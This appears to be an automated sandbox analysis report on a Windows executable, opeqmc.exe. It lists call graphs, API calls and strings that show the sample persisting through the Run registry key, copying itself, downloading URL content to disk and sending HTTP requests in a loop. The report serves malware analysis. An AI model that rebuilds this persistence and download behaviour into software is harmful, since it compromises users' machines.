40a6cf 3673->3676 3674 40a6fc InternetCloseHandle 3674->3676 3675 40a716 ExitProcess 3676->3674 3676->3675 3677->3620 3679 406d22 3678->3679 3680 406d26 InternetOpenW 3678->3680 3679->3628 3680->3628 3710 407e2b 3681->3710 3683 4078dd 3687 407900 3683->3687 3716 40782a GetModuleFileNameW CreateFileW 3683->3716 3685 4078ec 3685->3687 3720 407d61 3685->3720 3687->3633 3689 406cf6 3688->3689 3689->3635 3691 40a722 3690->3691 3692 40a739 3691->3692 3732 4079ff 3691->3732 3692->3640 3695 40a75d 3694->3695 3696 40a76e 3695->3696 3697 4079ff 5 API calls 3695->3697 3696->3640 3697->3696 3699 40d5b0 3698->3699 3700 406e76 GetTickCount 3699->3700 3701 406e92 3700->3701 3738 407b4e 3701->3738 3703 406f49 3747 409c99 3703->3747 3707 407017 3707->3640 3708 406ff4 3708->3707 3763 407a3c 3708->3763 3711 407e3d 3710->3711 3712 407e4e SetFilePointer ReadFile 3710->3712 3726 407cd7 3711->3726 3715 407e7e 3712->3715 3714 407e44 3714->3712 3714->3715 3715->3683 3715->3715 3717 407871 GetFileTime CloseHandle 3716->3717 3718 407888 GetTickCount 3716->3718 3719 407893 3717->3719 3718->3719 3719->3685 3721 407d70 3720->3721 3724 407d77 3720->3724 3722 407cd7 3 API calls 3721->3722 3722->3724 3723 407d81 3723->3687 3724->3723 3725 407dfa SetFilePointer WriteFile 3724->3725 3725->3687 3727 40d5b0 3726->3727 3728 407ce4 GetModuleFileNameW 3727->3728 3729 407d0d GetCurrentDirectoryW 3728->3729 3730 407d00 3728->3730 3729->3730 3731 407d36 CreateFileW 3730->3731 3731->3714 3735 407908 3732->3735 3734 407a05 3734->3691 3736 407e2b 5 API calls 3735->3736 3737 407919 3736->3737 3737->3734 3773 407267 3738->3773 3740 407b63 3741 407e2b 5 API calls 3740->3741 3742 407b83 3740->3742 3741->3742 3743 407c6b 3742->3743 3778 40bcb4 3742->3778 3788 40bd55 3743->3788 3748 409ca6 3747->3748 3749 409cbb InternetOpenUrlW 3748->3749 3750 409cdf GetProcessHeap HeapAlloc 3749->3750 3751 406fe2 3749->3751 3750->3751 3752 409d5b InternetReadFile 3750->3752 3751->3707 3759 406e00 3751->3759 3753 409d79 GetProcessHeap HeapAlloc 3752->3753 3754 409d0b 3752->3754 3757 409d92 GetProcessHeap HeapFree 3753->3757 3754->3752 3754->3753 3755 409d1f GetProcessHeap HeapReAlloc 3754->3755 3758 40c5d0 __VEC_memcpy 3754->3758 3755->3751 3755->3754 3757->3751 3758->3754 3760 406e12 3759->3760 3761 40c5d0 __VEC_memcpy 3760->3761 3762 406e21 3761->3762 3762->3708 3764 407a4f 3763->3764 3765 40c5d0 __VEC_memcpy 3764->3765 3772 407b42 3764->3772 3766 407a7d 3765->3766 3767 407267 3 API calls 3766->3767 3766->3772 3768 407b17 3767->3768 3769 407267 3 API calls 3768->3769 3770 407b20 3769->3770 3771 407d61 5 API calls 3770->3771 3771->3772 3772->3707 3774 407284 3773->3774 3775 407278 GetSystemTime 3773->3775 3776 40728b SystemTimeToFileTime SystemTimeToFileTime 3774->3776 3775->3776 3777 4072e8 __aulldiv 3776->3777 3777->3740 3780 40bcd3 3778->3780 3779 40bd17 3781 40bd3a 3779->3781 3784 40b51c __VEC_memcpy 3779->3784 3780->3779 3794 40c5d0 3780->3794 3782 40bd4d 3781->3782 3785 40c5d0 __VEC_memcpy 3781->3785 3782->3743 3784->3779 3785->3782 3789 40bd5c 3788->3789 3789->3789 3790 40bd9e 3789->3790 3791 40bcb4 __VEC_memcpy 3789->3791 3792 40bcb4 __VEC_memcpy 3790->3792 3791->3790 3793 407c7c 3792->3793 3793->3703 3795 40c5e8 3794->3795 3796 40c60f __VEC_memcpy 3795->3796 3797 40bcf9 3795->3797 3796->3797 3797->3782 3798 40b51c 3797->3798 3799 40b543 3798->3799 3800 40b552 3798->3800 3801 40c5d0 __VEC_memcpy 3799->3801 3800->3779 3801->3800 3807 4079a2 3802->3807 3803 4079f1 3804 407951 36 API calls 3803->3804 3805 4079fc 3804->3805 3805->3650 3806 407e2b 5 API calls 3806->3807 3807->3803 3807->3806 3814 40791c 3807->3814 3811 407965 3809->3811 3810 407e2b 5 API calls 3810->3811 3811->3810 3812 40798e 3811->3812 3813 40791c 36 API calls 3811->3813 3812->3650 3813->3811 3815 407d61 5 API calls 3814->3815 3816 407930 3815->3816 3817 407939 GetLastError 3816->3817 3818 407949 3816->3818 3819 40a786 35 API calls 3817->3819 3818->3807 3819->3818 3821 40760a CreateFileW 3820->3821 3822 407622 3820->3822 3821->3822 3823 40762a GetFileSize GetProcessHeap RtlAllocateHeap 3821->3823 3822->3581 3823->3822 3824 407650 ReadFile 3823->3824 3824->3822 3825 40766a 3824->3825 3825->3822 3826 407673 WriteFile SetFilePointer ReadFile SetFilePointer ReadFile 3825->3826 3829 40584d 3826->3829 3828 4076cc SetFilePointer WriteFile CloseHandle CloseHandle 3828->3822 3829->3828 3831 40d53c __VEC_memzero 3830->3831 3831->3589 3832->3597 3833->3593 4120 409a07 4123 409a14 4120->4123 4121 409a92 4122 409a6d SysAllocString 4122->4121 4123->4121 4123->4122 3868 409c49 3869 409c54 SysAllocString 3868->3869 3870 409c6e 3868->3870 3869->3870 4133 409909 4134 409916 4133->4134 4141 409723 4134->4141 4136 409934 4137 409723 __VEC_memcpy 4136->4137 4139 409a02 4136->4139 4138 4099d5 4137->4138 4138->4139 4140 4099de SysAllocString SysAllocString 4138->4140 4140->4139 4142 409733 4141->4142 4143 40c5d0 __VEC_memcpy 4142->4143 4144 409772 4142->4144 4143->4144 4144->4136 4145 40920a 4147 409217 4145->4147 4146 40929f SysAllocString 4147->4146 4148 40d00b IsDebuggerPresent 4153 40d247 4148->4153 4150 40d0d6 SetUnhandledExceptionFilter UnhandledExceptionFilter 4151 40d0fb GetCurrentProcess TerminateProcess 4150->4151 4152 40d0f3 ___report_gsfailure 4150->4152 4152->4151 4153->4150 4154 40500c 4166 40500e 4154->4166 4155 4050f2 4156 40c5b9 SysFreeString 4155->4156 4157 4050fb 4156->4157 4158 40c5b9 SysFreeString 4157->4158 4159 405103 4158->4159 4160 40c5b9 SysFreeString 4159->4160 4161 405109 4160->4161 4162 40c5b9 SysFreeString 4161->4162 4163 405111 4162->4163 4164 40c5b9 SysFreeString 4163->4164 4165 405120 4164->4165 4166->4155 4167 40c43d 4 API calls 4166->4167 4168 4050ce 4167->4168 4169 40c00b 3 API calls 4168->4169 4171 4050e2 4168->4171 4169->4171 4170 40be3a HeapFree 4170->4155 4171->4170 4172 40978d 4173 40979a 4172->4173 4174 409655 __VEC_memcpy 4173->4174 4175 4097b3 4174->4175 4176 4097ba 4175->4176 4177 409655 __VEC_memcpy 4175->4177 4178 4097d6 4177->4178 4179 409805 4178->4179 4180 4097df SysAllocString SysAllocString 4178->4180 4180->4179 3871 40bfd0 3872 40bfd7 3871->3872 3873 40bfda 3871->3873 3874 40bff3 3873->3874 3877 40be27 HeapAlloc 3873->3877 3876 40bffa 3877->3876 3878 40cbd0 3881 40cbfb __except_handler4 3878->3881 3879 40cc74 __except_handler4 3881->3879 3883 40ce9a RtlUnwind 3881->3883 3882 40ccf4 __except_handler4 3883->3882 4181 40c290 4186 40c2b6 4181->4186 4187 40c2ae 4181->4187 4182 40bde1 3 API calls 4182->4186 4183 40c340 4193 40be54 4183->4193 4186->4182 4186->4183 4186->4187 4188 40c05c 4186->4188 4189 40c066 4188->4189 4190 40c06a 4188->4190 4189->4186 4190->4189 4199 40be27 HeapAlloc 4190->4199 4192 40c086 4192->4186 4194 40be73 4193->4194 4195 40be5b 4193->4195 4194->4187 4195->4194 4196 40be3a HeapFree 4195->4196 4197 40be6d 4195->4197 4196->4195 4198 40be3a HeapFree 4197->4198 4198->4194 4199->4192 4200 40d990 4201 40d993 VirtualQuery 4200->4201 4203 40d9b2 4201->4203 4205 40d7d1 _ValidateScopeTableHandlers __except_handler4 __FindPESection 4201->4205 4204 40d9cc GetVersionExA 4203->4204 4203->4205 4204->4205 4206 409a99 4207 409aa6 4206->4207 4208 409723 __VEC_memcpy 4207->4208 4209 409ac4 4208->4209 4210 409723 __VEC_memcpy 4209->4210 4213 409b18 4209->4213 4211 409ae9 4210->4211 4212 409af2 SysAllocString SysAllocString 4211->4212 4211->4213 4212->4213 4214 407499 GetLocalTime GetLocalTime GetTimeZoneInformation SystemTimeToFileTime SystemTimeToFileTime 4215 40754f __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 4214->4215 4216 40c519 4223 40c4b4 CoCreateInstance 4216->4223 4219 40c531 VariantInit SysAllocString 4220 40c551 VariantClear 4219->4220 4221 40c589 4219->4221 4220->4221 4224 40c4dd 4223->4224 4224->4219 4224->4221 4225 409f99 Sleep 4226 409fa7 4225->4226 3884 40a65e 3885 40a662 Sleep 3884->3885 3887 406adf 3888 406aec 3887->3888 3889 406b11 RegOpenKeyExW 3888->3889 3890 406b34 3889->3890 3904 406b4f 3889->3904 3905 4069c0 RegQueryValueExW RegCloseKey 3890->3905 3892 406b49 3893 406b78 RegOpenKeyExW 3892->3893 3892->3904 3894 406b96 3893->3894 3897 406ba6 3893->3897 3906 4069c0 RegQueryValueExW RegCloseKey 3894->3906 3896 4069fd 3 API calls 3898 406bc3 3896->3898 3897->3896 3897->3898 3899 406c03 RegOpenKeyExW 3898->3899 3898->3904 3900 406c21 3899->3900 3901 406c31 3899->3901 3907 4069c0 RegQueryValueExW RegCloseKey 3900->3907 3903 4069fd 3 API calls 3901->3903 3901->3904 3903->3904 3905->3892 3906->3897 3907->3901 4227 409021 4228 409025 SysFreeString 4227->4228 4229 40902c 4227->4229 4228->4229 4230 409040 4229->4230 4231 409043 SysFreeString 4229->4231 4232 409058 4229->4232 4230->4231 4233 40912b 4231->4233 4234 409091 GetTickCount 4232->4234 4235 40905f 4232->4235 4241 4090ae 4234->4241 4236 40908f 4235->4236 4237 40906a SysAllocString 4235->4237 4238 409108 SysFreeString 4236->4238 4239 40911b SysFreeString 4236->4239 4237->4235 4238->4238 4238->4239 4239->4233 4240 4090c7 SysAllocString 4240->4241 4241->4236 4241->4240 4242 40d2a4 4243 40d2ac 4242->4243 4244 40d378 __except_handler3 4243->4244 4248 40d790 4243->4248 4247 40d2e5 __except_handler3 __except_handler4 _CallDestructExceptionObject 4247->4244 4254 40d110 RtlUnwind 4247->4254 4251 40d7d1 _ValidateScopeTableHandlers __except_handler4 __FindPESection 4248->4251 4253 40d7e5 _ValidateScopeTableHandlers __except_handler4 __FindPESection 4248->4253 4249 40d99d VirtualQuery 4250 40d9b2 4249->4250 4249->4251 4250->4251 4252 40d9cc GetVersionExA 4250->4252 4251->4247 4252->4251 4253->4249 4253->4251 4254->4247 3908 406a68 RegOpenKeyExW 3909 406a96 3908->3909 3910 406a9a 3908->3910 3914 4069c0 RegQueryValueExW RegCloseKey 3910->3914 3912 406aaa 3912->3909 3913 4069fd 3 API calls 3912->3913 3913->3909 3914->3912 3915 40a469 3916 40a479 3915->3916 3918 40a4dc 3916->3918 3921 40a4ef 3916->3921 3922 40a156 3916->3922 3919 40a530 InternetOpenW 3918->3919 3918->3921 3920 40a545 InternetSetOptionW 3919->3920 3919->3921 3920->3921 3923 40a16a 3922->3923 3926 40a16f 3922->3926 3934 40a0b5 CoInitialize 3923->3934 3928 40a188 SysAllocString 3926->3928 3937 40a057 GetForegroundWindow CoCreateInstance SetForegroundWindow 3926->3937 3930 40a1b8 3928->3930 3929 40a224 3929->3918 3930->3929 3931 40a1ce FindWindowW 3930->3931 3932 40a1e8 GetWindowLongW SetWindowLongW SetWindowPos 3931->3932 3933 40a1de SetParent 3931->3933 3932->3929 3933->3932 3935 40a0cc GetModuleHandleW CreateWindowExW 3934->3935 3936 40a0fd 3935->3936 3936->3926 3938 40a093 3937->3938 3938->3928 3938->3929 3939 4053ea HeapCreate 3940 405408 GetProcessHeap 3939->3940 3941 40541c 3939->3941 3940->3941 3946 405136 3941->3946 3947 405150 3946->3947 3948 4051e0 ExpandEnvironmentStringsW 3947->3948 3949 40520b 3947->3949 3948->3947 3951 405211 3949->3951 3963 40be3a 3949->3963 3952 405229 3951->3952 3953 405238 3952->3953 3954 407b4e 9 API calls 3953->3954 3955 4052e8 3954->3955 3956 406d14 2 API calls 3955->3956 3959 405361 Sleep 3955->3959 3962 405372 3955->3962 3956->3955 3957 40537c Sleep 3957->3962 3959->3955 3960 4053cb Sleep 3960->3962 3961 4053e0 3962->3957 3962->3960 3962->3961 3966 409df4 3962->3966 3964 40be41 HeapFree 3963->3964 3965 40be53 3963->3965 3964->3965 3965->3951 3967 409e01 3966->3967 3979 40beea 3967->3979 3970 409eb1 HttpOpenRequestW 3971 409ead 3970->3971 3973 409ecf HttpSendRequestW 3970->3973 3971->3962 3974 40be3a HeapFree 3973->3974 3975 409eea 3974->3975 3975->3971 3976 409eef InternetReadFile 3975->3976 3976->3971 3977 409f0c 3976->3977 3987 40bf35 3977->3987 3980 40bef4 3979->3980 3991 40beb4 3980->3991 3984 40bf1c 3985 40beb4 WideCharToMultiByte 3984->3985 3986 409e3e InternetConnectW 3984->3986 3985->3986 3986->3970 3986->3971 3988 40bf3a 3987->3988 3989 40bf3f MultiByteToWideChar 3987->3989 3988->3989 3990 40bf58 3989->3990 3990->3971 3992 40bec3 WideCharToMultiByte 3991->3992 3993 40bebe 3991->3993 3994 40bedd 3992->3994 3993->3992 3994->3986 3995 40be27 HeapAlloc 3994->3995 3995->3984 4255 409f2b 4256 409f37 4255->4256 4257 409f40 GetTickCount 4256->4257 4258 409f5f GetTickCount 4257->4258 4259 409f67 PeekMessageW 4258->4259 4262 409fa7 4258->4262 4260 409f88 Sleep 4259->4260 4261 409f7c DispatchMessageW 4259->4261 4260->4258 4261->4259 4263 40d2ac 4264 40d2ca 4263->4264 4266 40d378 __except_handler3 4263->4266 4265 40d790 __except_handler3 2 API calls 4264->4265 4268 40d2e5 __except_handler3 __except_handler4 _CallDestructExceptionObject 4265->4268 4268->4266 4269 40d110 RtlUnwind 4268->4269 4269->4268 3996 4072ed GetSystemTime SystemTimeToFileTime SystemTimeToFileTime 3997 40735e __aulldiv 3996->3997 3998 409c6f 3999 409c90 3998->3999 4000 409c7a SysFreeString 3998->4000 4000->3999 4000->4000 4270 407036 DeleteFileW CreateFileW 4271 407078 GetLastError 4270->4271 4276 40706b 4270->4276 4272 407095 InternetOpenUrlW 4271->4272 4273 407089 SetEndOfFile 4271->4273 4274 4070c6 InternetQueryDataAvailable 4272->4274 4275 4070b8 CloseHandle 4272->4275 4273->4272 4277 407119 InternetReadFile 4274->4277 4275->4276 4278 407123 CloseHandle InternetCloseHandle 4277->4278 4279 4070ed 4277->4279 4278->4276 4279->4278 4280 4070f2 WriteFile 4279->4280 4280->4277 4281 4094b6 4282 4094c9 4281->4282 4283 4094cd 4282->4283 4284 4094f3 CharLowerW CharLowerW 4282->4284 4285 4094e3 SysFreeString 4282->4285 4287 409560 4284->4287 4289 409512 4284->4289 4286 40957e 4285->4286 4288 40956f SysFreeString SysFreeString 4287->4288 4288->4286 4289->4287 4289->4288 4290 40953a CharLowerW 4289->4290 4291 409544 4290->4291 4292 40956a SysFreeString 4291->4292 4292->4288 4001 406c77 RegOpenKeyExW 4002 406c9b 4001->4002 4003 406c9f 4001->4003 4006 4069c0 RegQueryValueExW RegCloseKey 4003->4006 4005 406cb0 4006->4005 4007 40a8f9 4008 40a906 4007->4008 4009 406d14 2 API calls 4008->4009 4010 40a917 Sleep 4008->4010 4011 40a92c 4008->4011 4009->4008 4010->4008 4012 4078cb 12 API calls 4011->4012 4013 40aa37 4012->4013 4014 406cb5 GetVersionExW 4013->4014 4015 40aa52 4014->4015 4016 40a718 5 API calls 4015->4016 4017 40aa7e 4016->4017 4018 40a744 5 API calls 4017->4018 4019 40aa91 4018->4019 4020 406e69 22 API calls 4019->4020 4021 40aabc Sleep 4019->4021 4022 40aae5 GetProcessHeap HeapFree 4019->4022 4023 40a744 5 API calls 4019->4023 4020->4019 4021->4019 4023->4019 4024 40c3f9 4025 40c402 4024->4025 4026 40c407 4024->4026 4027 40c412 wvnsprintfW 4026->4027 4028 40c42e 4027->4028 4295 4091bd 4301 40a582 4295->4301 4297 4091cc 4298 4091d2 4297->4298 4299 409655 __VEC_memcpy 4297->4299 4300 4091eb SysFreeString 4299->4300 4300->4298 4302 40a5a0 4301->4302 4303 40a5a4 4301->4303 4302->4297 4304 40a63f 4303->4304 4307 40a5ae 4303->4307 4305 40a64e SysAllocString 4304->4305 4306 40a63b 4304->4306 4305->4306 4306->4297 4307->4306 4308 40a632 SysFreeString 4307->4308 4308->4306

                  Control-flow Graph

                  APIs
                  • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000400), ref: 004075FC
                  • CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618
                  • GetFileSize.KERNEL32(?,00000000), ref: 0040762E
                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407638
                  • RtlAllocateHeap.NTDLL(00000000), ref: 0040763F
                  • ReadFile.KERNELBASE(?,00000000,00000000,?,00000000), ref: 00407660
                  • WriteFile.KERNELBASE(?,?,00000000,?,00000000), ref: 0040767F
                  • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000), ref: 00407691
                  • ReadFile.KERNELBASE(?,?,00000040,?,00000000), ref: 004076A1
                  • SetFilePointer.KERNELBASE(?,?,00000000,00000000), ref: 004076AF
                  • ReadFile.KERNELBASE(?,?,000000F8,?,00000000), ref: 004076C5
                  • SetFilePointer.KERNELBASE(?,?,00000000,00000000), ref: 004076EF
                  • WriteFile.KERNELBASE(?,?,000000F8,?,00000000), ref: 00407705
                  • CloseHandle.KERNELBASE(?), ref: 00407714
                  • CloseHandle.KERNEL32(?), ref: 00407719
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: File$PointerRead$CloseCreateHandleHeapWrite$AllocateProcessSize
                  • String ID:
                  • API String ID: 2296163861-0
                  • Opcode ID: 894f1e02061cece153af19de11902bbae5fe70548c4ece14d410128547cdf08b
                  • Instruction ID: 7ae3b020874f099f6a4231377d147a855b3f50186be4225f3fece46b7b724b47
                  • Opcode Fuzzy Hash: 894f1e02061cece153af19de11902bbae5fe70548c4ece14d410128547cdf08b
                  • Instruction Fuzzy Hash: F0416A71901028BADB209BA2DD48EEFBF7DEF45390F104476F619F21A0D7709A10DB64

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 121 40abd9-40abf5 call 40ac20 124 40abf7-40ac0c FindFirstFileW 121->124 125 40ac1a 121->125 124->125 127 40ac0e-40ac18 FindClose 124->127 126 40ac1c-40ac1f 125->126 127->126
                  APIs
                    • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,771B0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
                    • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
                  • FindFirstFileW.KERNEL32(?,00000000), ref: 0040AC03
                  • FindClose.KERNEL32(00000000), ref: 0040AC0F
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: FindOpen$CloseFileFirst
                  • String ID:
                  • API String ID: 3155378417-0
                  • Opcode ID: ab3d299b7ad4ae48143099222020c13c56cdbf39ef5f27e8c74799f3a551cc1f
                  • Instruction ID: fa0310e4c65bbc590993533f650c85f5e3ee77ef27cd51fa1c8f473dbf319076
                  • Opcode Fuzzy Hash: ab3d299b7ad4ae48143099222020c13c56cdbf39ef5f27e8c74799f3a551cc1f
                  • Instruction Fuzzy Hash: 5DE0D87160C7044BE220E7B49D0C967B3DCAB45325F000F36A9B6E20C0FA38D46A465F

                  Control-flow Graph

                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B36C
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B39D
                    • Part of subcall function 004069FD: RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00020006,00000000,?,?,00000400,?,?,?,0040B3BC,80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run), ref: 00406A22
                  • GetLastError.KERNEL32(00000004), ref: 0040B3CA
                  • Sleep.KERNEL32(00002710), ref: 0040B3F7
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B413
                  • CopyFileW.KERNEL32(?,?,00000000), ref: 0040B435
                  • ExitProcess.KERNEL32 ref: 0040B44D
                    • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,771B0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
                    • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
                  • GetLastError.KERNEL32(00000004), ref: 0040B48D
                  • GetLastError.KERNEL32(00000004), ref: 0040B49A
                  • ExpandEnvironmentStringsW.KERNEL32(?,00000400), ref: 0040B4C7
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B4D7
                  • GetLastError.KERNEL32(00000004), ref: 0040B500
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: File$ErrorLastModuleName$Open$CopyCreateEnvironmentExitExpandProcessSleepStrings
                  • String ID: /nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$opeqmc.exe
                  • API String ID: 3692109554-477663111
                  • Opcode ID: 27e6cc8fbb92a4a1dc8a331001041fcfa920682934159512c1d60e9f15f909f3
                  • Instruction ID: ccf8aad4361994264e72a39918ed7d53ff083e628d4a69ee62a5d407c68d8035
                  • Opcode Fuzzy Hash: 27e6cc8fbb92a4a1dc8a331001041fcfa920682934159512c1d60e9f15f909f3
                  • Instruction Fuzzy Hash: 8C4127719042186AE710B7A19D46FAB73ACEF04345F14447BBB05F11C2EB789A548AAF

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 73 40ac20-40ac48 RegOpenKeyExW 74 40ac60-40ac76 RegOpenKeyExW 73->74 75 40ac4a-40ac55 call 4069c0 73->75 76 40ac78-40ac7a 74->76 77 40ac7c-40ac87 call 4069c0 74->77 81 40ac5a-40ac5e 75->81 79 40ac8e-40ac92 76->79 82 40ac8c-40ac8d 77->82 81->74 81->79 82->79
                  APIs
                  • RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,771B0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
                  • RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
                    • Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                    • Part of subcall function 004069C0: RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: Open$CloseQueryValue
                  • String ID: /nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                  • API String ID: 3546245721-4228964922
                  • Opcode ID: e183a9483fa9f7ba9bb43204af9f8e84b77f88267b9ccf7be8296576afd26502
                  • Instruction ID: 3bac8edf5f415b784fe4546894dc74dc09b9405a13c640cee1cd261e7a9a2bb6
                  • Opcode Fuzzy Hash: e183a9483fa9f7ba9bb43204af9f8e84b77f88267b9ccf7be8296576afd26502
                  • Instruction Fuzzy Hash: 5F01867265430EFEFF1096919D42F9A736CDB40768F210036FA00B60D1D6B6AE155779

                  Control-flow Graph

                  APIs
                  • GetCommandLineW.KERNEL32(?,0040B3E5), ref: 0040AB0A
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000820,00000400,?,0040B3E5), ref: 0040AB44
                  • CharLowerW.USER32(?,?,0040B3E5), ref: 0040AB57
                  • CharLowerW.USER32(?,?,0040B3E5), ref: 0040AB60
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: CharLower$CommandFileLineModuleName
                  • String ID: /nomove
                  • API String ID: 1338073227-1111986840
                  • Opcode ID: 00c7a09b5e38cd9dc17e43fc8aab8f350de87f2bf6048177a511846302a86bad
                  • Instruction ID: b8029fc6669f79c45f6caaa8ce38406425976cf3cabd4088da44db58d281c6d8
                  • Opcode Fuzzy Hash: 00c7a09b5e38cd9dc17e43fc8aab8f350de87f2bf6048177a511846302a86bad
                  • Instruction Fuzzy Hash: 7CF01D7290022956DB10A7B19C05BDB72ACFF40309F0445B6AA05F2180ED78EA548F95

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 96 407727-407751 call 40d5b0 GetModuleFileNameW 99 407753-40776b call 4075d4 96->99 100 40776d-40776e 96->100 105 4077e1-4077ea 99->105 102 407774-407797 ExpandEnvironmentStringsW call 4075d4 100->102 106 40779c-4077a0 102->106 107 4077a2-4077a5 106->107 108 4077eb-4077ee 106->108 109 4077b7-4077ba 107->109 110 4077a7-4077b5 GetLastError 107->110 111 4077e0 108->111 113 4077d2-4077dc 109->113 114 4077bc-4077c8 GetLastError 109->114 112 4077ca-4077cf call 40a786 110->112 111->105 112->113 113->102 116 4077de 113->116 114->112 116->111
                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400,771B0900,00000400,00000000,0040B4B3,00000000), ref: 00407744
                  • ExpandEnvironmentStringsW.KERNEL32(?,00000400), ref: 00407784
                  • GetLastError.KERNEL32(00000004), ref: 004077A9
                    • Part of subcall function 004075D4: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000400), ref: 004075FC
                    • Part of subcall function 004075D4: CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618
                  Memory Dump Source
